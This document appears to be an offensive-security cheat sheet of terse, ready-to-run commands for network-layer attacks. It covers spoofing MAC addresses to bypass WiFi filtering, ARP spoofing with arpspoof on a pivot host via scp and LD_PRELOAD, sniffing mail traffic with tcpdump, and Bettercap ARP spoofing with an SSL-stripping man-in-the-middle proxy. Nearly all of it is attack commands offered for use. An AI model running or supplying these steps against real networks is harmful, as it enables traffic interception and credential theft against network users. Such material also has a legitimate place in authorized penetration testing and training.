MAC & ARP

MAC Filtering

Ethernet
sudo macchanger -a eth0
WiFi
sudo airmon-ng start wlan0
$ airodump-ng –c [channel]–bssid [target router MAC Address]–i wlan0mon  # Trouver des MAC whitelisted
sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
sudo macchanger -m [New MAC Address] wlan0
sudo ifconfig wlan0 up

ARP Spoofing

# Old technique but still usable sometimes
# You can spoof ARP trafic in order to discover new machines
# If you are pivoting through a machine, you may need to upload arpspoof on the target
scp /usr/sbin/arpspoof user@ip:/tmp

# Then, you may need to identify and upload specific librairies
# WARNING : It can be dangerous for target
ldd /usr/sbin/arpspoof 
scp <path> user@ip:/tmp
export LD_PRELOAD=./libnet.so.1

# Then you can exploit on the target
# Example, spoof a gateway to discover a DC
arpspoof -i eth1 -t <victim> <impersonated machine>
 
# Terminal 2
tcpdump -i eth1 -A tcp port 143 or port 25

ARP Spoofing using Bettercap

# Activate router mode on attacker machine
echo 1 > /proc/sys/net/ipv4/ip_forward

# Show machines in the LAN
> net.show

# Set target for ARP spoofing
> set arp.spoof.targets 192.168.5.99

# Launch attack
> arp.spoof on

Proxy MiTM using Bettercap

# Configure sniffer verbosity
> set net.sniff.verbose false
> net.sniff on

# Then set the SSL proxy (It will create an autogenerated SSL cert)
> set http.proxy.sslstrip true
> http.proxy on